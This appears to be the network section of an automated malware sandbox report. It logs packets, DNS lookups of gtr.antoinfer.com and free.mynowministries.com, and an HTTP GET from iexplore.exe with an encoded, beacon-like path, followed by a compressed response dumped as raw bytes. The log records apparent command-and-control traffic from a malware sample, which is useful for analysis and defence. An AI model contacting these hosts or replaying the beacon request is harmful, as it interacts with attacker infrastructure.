Jul 8, 2021 15:47:38.271089077 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271096945 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271155119 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271169901 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271176100 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271195889 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271222115 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271244049 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271274090 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271286011 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271289110 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271300077 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271351099 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271370888 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271387100 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271405935 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271456003 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271466970 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271471024 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271508932 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271528959 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271553040 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271563053 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271575928 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271591902 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271595001 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271609068 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.271663904 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271682978 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.271687031 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.382658005 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.382801056 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.444940090 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445029974 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445060968 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445081949 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445101023 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445085049 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445121050 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445147991 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445171118 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445172071 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445175886 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445194960 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445216894 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445233107 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445240974 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445249081 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445252895 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445256948 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445259094 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445261955 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445266008 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445280075 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445291996 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.445341110 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445359945 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.445363998 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.458271027 CEST	49760	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.624928951 CEST	80	49760	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.766030073 CEST	80	49762	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.766081095 CEST	80	49762	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:38.766189098 CEST	49762	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.774800062 CEST	49762	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:38.940949917 CEST	80	49762	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:39.574058056 CEST	49761	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:39.785698891 CEST	80	49761	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:39.950328112 CEST	49763	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:40.508263111 CEST	80	49761	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:40.508295059 CEST	80	49761	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:40.508574009 CEST	49761	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:40.511940956 CEST	49761	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:40.683345079 CEST	80	49761	165.232.183.49	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 8, 2021 15:44:58.490741014 CEST	64185	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:44:58.504507065 CEST	53	64185	8.8.8.8	192.168.2.3
Jul 8, 2021 15:44:59.104778051 CEST	65110	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:44:59.117650986 CEST	53	65110	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:00.775324106 CEST	58361	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:00.790585995 CEST	53	58361	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:01.689548969 CEST	63492	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:01.705452919 CEST	53	63492	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:02.469089985 CEST	60831	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:02.482681036 CEST	53	60831	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:03.527302027 CEST	60100	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:03.540301085 CEST	53	60100	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:06.538055897 CEST	53195	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:06.550508022 CEST	53	53195	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:09.247096062 CEST	50141	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:09.259601116 CEST	53	50141	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:10.368503094 CEST	53023	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:10.400414944 CEST	49563	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:10.415256023 CEST	53	49563	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:10.429045916 CEST	53	53023	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:10.845033884 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:10.883271933 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:11.838382959 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:11.888166904 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:12.376907110 CEST	59349	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:12.393397093 CEST	53	59349	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:12.538357973 CEST	57084	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:12.660362959 CEST	53	57084	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:12.854002953 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:12.867439032 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:13.438555956 CEST	58823	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:13.454149008 CEST	53	58823	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:14.180490971 CEST	57568	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:14.193964958 CEST	53	57568	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:14.822968960 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:14.839948893 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:15.020694971 CEST	50540	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:15.035990000 CEST	53	50540	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:15.725830078 CEST	54366	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:15.739042997 CEST	53	54366	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:16.612771034 CEST	53034	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:16.626346111 CEST	53	53034	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:17.311503887 CEST	57762	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:17.325329065 CEST	53	57762	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:18.037586927 CEST	55435	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:18.050470114 CEST	53	55435	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:18.873898983 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:18.888286114 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:30.429289103 CEST	50713	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:30.458503962 CEST	53	50713	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:35.873209953 CEST	56132	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:35.913908958 CEST	53	56132	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:49.567156076 CEST	58987	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:49.600656986 CEST	53	58987	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:52.997692108 CEST	56579	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:53.013279915 CEST	53	56579	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:53.949455023 CEST	60633	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:53.963741064 CEST	53	60633	8.8.8.8	192.168.2.3
Jul 8, 2021 15:45:55.503710032 CEST	61292	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:45:55.517919064 CEST	53	61292	8.8.8.8	192.168.2.3
Jul 8, 2021 15:46:00.317193031 CEST	63619	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:46:00.336724997 CEST	53	63619	8.8.8.8	192.168.2.3
Jul 8, 2021 15:46:01.903301001 CEST	64938	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:46:01.917671919 CEST	53	64938	8.8.8.8	192.168.2.3
Jul 8, 2021 15:46:02.294727087 CEST	61946	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:46:02.322993040 CEST	53	61946	8.8.8.8	192.168.2.3
Jul 8, 2021 15:46:41.217731953 CEST	64910	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:46:41.231363058 CEST	53	64910	8.8.8.8	192.168.2.3
Jul 8, 2021 15:46:44.750526905 CEST	52123	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:46:44.764513016 CEST	53	52123	8.8.8.8	192.168.2.3
Jul 8, 2021 15:46:46.216243029 CEST	56130	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:46:47.222793102 CEST	56130	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:46:47.505951881 CEST	53	56130	8.8.8.8	192.168.2.3
Jul 8, 2021 15:46:50.491420984 CEST	53	56130	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:14.720967054 CEST	56338	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:14.736998081 CEST	53	56338	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:15.708970070 CEST	56338	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:15.723954916 CEST	53	56338	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:16.734513044 CEST	56338	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:16.746998072 CEST	53	56338	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:18.739809990 CEST	56338	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:18.753375053 CEST	53	56338	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:22.756377935 CEST	56338	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:22.769054890 CEST	53	56338	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:29.490900993 CEST	59420	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:29.511019945 CEST	53	59420	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:30.710268974 CEST	58784	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:30.725452900 CEST	53	58784	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:32.668920040 CEST	63978	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:32.682585955 CEST	53	63978	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:35.493366003 CEST	62938	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:35.783593893 CEST	53	62938	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:37.660630941 CEST	55708	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:37.674045086 CEST	53	55708	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:53.472146034 CEST	56803	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:53.487234116 CEST	53	56803	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:54.789647102 CEST	57145	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:54.805146933 CEST	53	57145	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:55.719249964 CEST	55359	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:55.732538939 CEST	53	55359	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:56.673897028 CEST	58306	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:56.686563969 CEST	53	58306	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:57.634944916 CEST	64124	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:57.648574114 CEST	53	64124	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:58.478595018 CEST	49361	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:58.491975069 CEST	53	49361	8.8.8.8	192.168.2.3
Jul 8, 2021 15:47:59.530437946 CEST	63150	53	192.168.2.3	8.8.8.8
Jul 8, 2021 15:47:59.543267965 CEST	53	63150	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jul 8, 2021 15:46:50.491585970 CEST	192.168.2.3	8.8.8.8	d004	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 8, 2021 15:45:12.538357973 CEST	192.168.2.3	8.8.8.8	0x921f	Standard query (0)	free.mynowministries.com	A (IP address)	IN (0x0001)
Jul 8, 2021 15:46:46.216243029 CEST	192.168.2.3	8.8.8.8	0xffeb	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 8, 2021 15:46:47.222793102 CEST	192.168.2.3	8.8.8.8	0xffeb	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 8, 2021 15:47:30.710268974 CEST	192.168.2.3	8.8.8.8	0x45dc	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 8, 2021 15:47:32.668920040 CEST	192.168.2.3	8.8.8.8	0xf55	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 8, 2021 15:47:35.493366003 CEST	192.168.2.3	8.8.8.8	0xb150	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 8, 2021 15:47:37.660630941 CEST	192.168.2.3	8.8.8.8	0x314c	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jul 8, 2021 15:45:12.660362959 CEST	8.8.8.8	192.168.2.3	0x921f	No error (0)	free.mynowministries.com	162.241.253.78	A (IP address)	IN (0x0001)
Jul 8, 2021 15:46:47.505951881 CEST	8.8.8.8	192.168.2.3	0xffeb	No error (0)	gtr.antoinfer.com	165.232.183.49	A (IP address)	IN (0x0001)
Jul 8, 2021 15:46:50.491420984 CEST	8.8.8.8	192.168.2.3	0xffeb	No error (0)	gtr.antoinfer.com	165.232.183.49	A (IP address)	IN (0x0001)
Jul 8, 2021 15:47:30.725452900 CEST	8.8.8.8	192.168.2.3	0x45dc	No error (0)	gtr.antoinfer.com	165.232.183.49	A (IP address)	IN (0x0001)
Jul 8, 2021 15:47:32.682585955 CEST	8.8.8.8	192.168.2.3	0xf55	No error (0)	gtr.antoinfer.com	165.232.183.49	A (IP address)	IN (0x0001)
Jul 8, 2021 15:47:35.783593893 CEST	8.8.8.8	192.168.2.3	0xb150	No error (0)	gtr.antoinfer.com	165.232.183.49	A (IP address)	IN (0x0001)
Jul 8, 2021 15:47:37.674045086 CEST	8.8.8.8	192.168.2.3	0x314c	No error (0)	gtr.antoinfer.com	165.232.183.49	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

gtr.antoinfer.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49755	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 8, 2021 15:46:47.694397926 CEST	6994	OUT	GET /7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 8, 2021 15:46:48.628479958 CEST	6995	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 13:46:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9b c7 72 a3 40 14 45 3f 88 05 19 c4 92 8c c8 39 ed c8 39 67 be 7e e4 29 ef 4c c9 88 ee 7e f7 9e 53 b2 e8 32 af 25 08 fd 9a e7 35 eb a9 e8 89 16 8b 3a cb 84 8f e5 ee d3 54 a8 9b ef 63 04 df 2c dd 96 75 37 a2 f3 eb c5 b6 49 1a e2 24 9c 42 da 4c ed 91 c8 5b dd 99 06 25 54 67 ff 04 bd 67 62 a6 d1 95 db 77 df 9c 3c 26 b5 e4 4b 24 6a 08 0b d4 30 42 29 89 a4 b3 a5 4e b0 d4 d2 f4 7e a5 96 cd 80 24 e0 9a f5 88 7c fd 87 fe 18 23 14 14 10 81 e3 3b c0 9b 3a f9 61 3a 70 24 3f 2c 51 6d 72 28 2c 09 f0 bb 48 d7 60 a2 68 3d 71 7f ef 86 a8 f8 25 8c 9e 8c 2c b4 16 91 7b a9 75 90 4e d2 d4 34 03 46 a0 9e eb 78 06 5a 51 ab 40 77 ed bc 65 8f 7d b6 6f 16 6c ba 34 12 56 36 b3 94 17 d0 46 63 49 18 c3 22 4b b5 0d 2b 83 0f 89 7d 37 d3 77 4d c6 24 34 a0 5c 8e 80 44 da 66 b0 db 06 00 ee 8a 7c 70 2a 5b c8 16 40 d8 e0 9a 14 72 cc ae 4b e9 61 35 b7 f1 4f 1b 0b 7c 9c 72 40 2a ac 6c b6 6b 00 41 48 07 a0 60 e2 e3 b0 7b 10 ae ab 1a c4 37 57 04 f2 ce f5 f9 24 7c c0 3e 7f 0a a2 62 bf 6e 7c ef 7e 26 72 e1 70 87 a8 10 d4 16 f4 91 ca f2 92 fb 0f ed 39 9e a6 e8 f1 6a b4 b9 13 18 5f 0f 26 88 d2 c8 b6 05 6c be 61 12 9b a6 0c 37 4a c3 46 66 46 c5 65 67 26 27 e8 e2 13 16 6f d2 bd 2e fe 57 d1 17 ba 76 0d 3f 3b b7 d4 0f e9 c1 3f d5 dc 75 ec 31 93 42 e3 4b ae 5f 70 c8 c5 6c 7b f7 f2 fa 4a 38 41 aa 64 1f 3e f6 76 b2 8e f7 48 40 5c e3 cf 80 43 17 fd 59 05 4f 50 1e 4d b6 eb 0e d1 fa da 21 6d b2 54 58 e5 ab 53 b6 aa 80 d8 f2 75 97 db be eb c0 33 4b b7 f1 14 c9 3a 6e da 05 99 35 7c 3f fb 84 34 15 4a aa 76 cc 5a bc b9 be a8 5f cd 72 b8 9d a5 10 18 2e 68 68 a8 12 7b 9c 12 a6 b9 54 f5 fc 23 cd 15 0a 2f 8f f3 2a ea 76 dd fd 86 1a 16 d1 31 7d d9 e5 18 96 7c b6 af 54 b0 7b b8 06 d2 70 e6 65 63 ed 45 9b 7d 9d 09 a6 0d fd 2d f8 19 7d 9e e4 c0 6d c5 5b 0a b0 0d 61 d9 d4 07 ea 7e b1 34 6a ed e3 ab ec 2f 76 06 32 54 b5 3a e4 84 85 c1 e1 1b 87 b1 40 bb 93 d5 ba 4e ec c1 18 17 43 81 6b 1e 5d 39 90 cf 31 64 5d 06 82 ba 76 cf 72 0e 9c 5b b3 15 12 47 b1 9d 79 3c f5 68 99 49 32 c3 e9 39 1d 48 8e b8 e1 76 dd bb 3c 87 7f b5 6f b9 cf b3 2c 12 f3 9a 2d 2e 3f 4f 91 bc e5 af 61 17 82 7d ad 87 f7 75 f2 4d c9 38 4f 44 8e eb 5d 44 f5 77 ba 0a de 2d 61 56 45 fb 11 65 c5 4a b3 7d b7 c3 46 2e 0e cf 63 6f a7 d2 f7 ed 31 1e a1 10 72 b7 16 bd d6 ed 90 07 8c 97 73 95 a0 b1 69 44 d0 e3 f8 2d c3 f1 dc 7e 1e f7 77 83 f3 22 f5 72 af 07 b6 25 39 0a 07 4f 2f 08 25 f5 d4 0d 55 7d 82 12 48 20 44 74 b6 71 60 ba 81 3a 1f c6 9a 6f cb a6 25 05 25 e4 79 a7 f8 be e8 6f 47 b9 2d 69 88 81 61 fc 09 4b ca c8 05 f2 ac 83 97 dc 9d bf 39 6b ed 8f 73 c9 94 d3 84 22 12 d4 c1 fb 51 c0 fe 42 6a 66 34 6b dd 1b 3e 59 63 9c 3c d2 f2 78 a6 fa 6a 14 79 dd da a4 83 e5 c1 72 f1 a9 55 69 d5 50 b1 76 a4 24 78 5c 84 9b 2f 42 ca 1a c6 67 bd af 8f 2c b8 1d 1b 99 06 1b 48 91 81 29 1c 7a fc 78 36 70 a8 55 f4 04 be 6e 2d f0 27 10 ab 2f 58 53 5a 4b 58 13 89 4c 03 e1 35 2a 96 45 43 a9 a6 2f 75 11 f4 94 da f7 74 7a 2e 46 59 0d 1c f7 c2 9c 9d c5 6c e4 ec 91 7e 58 32 d4 1f cb 03 c1 f9 e3 9b 59 3c fb ba 3d 0b ca 4b 9f 46 9e 22 23 f7 29 fc 10 a1 8b a0 77 51 9e ed 64 81 6f 93 df 14 8e 2b 31 ce 58 e8 af 38 83 8d d3 20 d5 5d 45 92 c6 59 Data Ascii: 2000r@E?99g~)L~S2%5:Tc,u7I$BL[%Tggbw<&K$j0B)N~$\|#;:a:p$?,Qmr(,H`h=q%,{uN4FxZQ@we}ol4V6FcI"K+}7wM$4\Df\|p[@rKa5O\|r@lkAH`{7W$\|>bn\|~&rp9j_&la7JFfFeg&'o.Wv?;?u1BK_pl{J8Ad>vH@\CYOPM!mTXSu3K:n5\|?4JvZ_r.hh{T#/v1}\|T{pecE}-}m[a~4j/v2T:@NCk]91d]vr[Gy<hI29Hv<o,-.?Oa}uM8OD]Dw-aVEeJ}F.co1rsiD-~w"r%9O/%U}H Dtq`:o%%yoG-iaK9ks"QBjf4k>Yc<xjyrUiPv$x\/Bg,H)zx6pUn-'/XSZKXL5EC/utz.FYl~X2Y<=KF"#)wQdo+1X8 ]EY
Jul 8, 2021 15:46:48.628520012 CEST	6997	IN	Data Raw: 95 c4 99 d6 cd ef 6e 21 65 36 d6 33 da 02 90 a8 ec d5 5e fd e7 0e 32 2f cb ee 6d aa c7 90 b4 15 2d 6e 31 12 aa a2 be 29 e1 a6 0d 09 33 28 b3 c1 30 58 15 32 f2 c4 18 43 db 08 04 50 5d 8d 67 f3 75 85 aa 89 9d c2 b2 0c 48 75 de cc 06 de 76 e8 d4 33 Data Ascii: n!e63^2/m-n1)3(0X2CP]guHuv3@']WPT$W`d6#j<5t"}w;6r'j-j M0l=:X>l=aDJ7RK&4:lN=>sr*SZ/n9
Jul 8, 2021 15:46:48.628554106 CEST	6998	IN	Data Raw: 40 66 29 03 a4 0d f0 f3 a5 1d a7 03 9b 62 44 b1 79 54 46 62 ed 97 0b 35 61 6b 73 85 56 a3 d2 24 d0 32 85 3d 50 df c8 0d 67 bd 5f 61 85 e3 8d 20 1d e9 56 58 b6 a8 59 ec ea c7 b6 d5 8b 25 47 76 fc c0 2b 06 fb ec 68 28 51 05 19 bc b7 d6 b8 cb 9a 31 Data Ascii: @f)bDyTFb5aksV$2=Pg_a VXY%Gv+h(Q1.b:b@',+YV&nU#HFiL_7g/N}H?\|Q%F)<KKjFZ<&](Z>o2M6W;_\P
Jul 8, 2021 15:46:48.628583908 CEST	7000	IN	Data Raw: 20 8c 33 7f d9 62 7d fd da 4a bf 56 c1 e4 e5 3a b4 c2 ec 6b 0d c5 08 3f ba 2a 5a 0f b3 24 f2 60 08 b5 d0 9e 94 6f 88 3d 96 73 92 0d 97 1a 40 c6 eb c7 67 bb 91 bd 30 06 b6 89 c7 44 5a 39 fd 5d 5c f3 f0 3b 73 e6 e9 60 4c fa 9e 61 d6 c2 d7 74 34 fd Data Ascii: 3b}JV:k?*Z$`o=s@g0DZ9]\;s`Lat41sCOMo+_5h\|DP`WTD^L)@g]eHu30AoEwEM>}N~AKKq8-97s&QLo-\@^RP'
Jul 8, 2021 15:46:48.628616095 CEST	7001	IN	Data Raw: 1e 74 d8 da 8c 21 51 99 48 03 92 cc b9 54 2a a5 18 c5 92 bd f9 a2 34 49 fa d8 e9 28 6a 59 f8 87 db f8 fd e9 e5 d6 bd bf 94 c6 38 60 49 6e 9c 02 57 d8 6c ef 25 ab ac 21 6e c1 fa 34 8c ba a4 33 97 e8 08 9f ca 48 f6 e0 e1 66 05 29 3e 5f d1 71 17 e5 Data Ascii: t!QHT4I(jY8`InWl%!n43Hf)>_qE$B.N9pC9XPNyc@d}Wl:6fX+]J%xmdhu19g JHaG3/xxMh==N;g>zQSm*sy"
Jul 8, 2021 15:46:48.628652096 CEST	7002	IN	Data Raw: 04 02 b1 0f bc 07 90 8b 3e 32 f4 8d 77 2b 04 bf 28 e4 91 af 97 3f 96 29 6b 72 40 73 df b1 4d f3 a5 3d 2e 8a c6 ac 0a 5a b5 25 56 42 cc c0 69 d1 db 25 8e 67 4e d0 eb 2d ad 91 f4 7b 52 6a aa 6b 0c cd 89 36 ea e0 9e 9e 63 ef f7 06 d2 2b 58 8f 2a e9 Data Ascii: >2w+(?)kr@sM=.Z%VBi%gN-{Rjk6c+X\|Oz&/m2P""A,IFq6Tdd(eBCg9wD[ZeN\m#,U=0?n^M9Dmbr.61$OgOZK4BL_
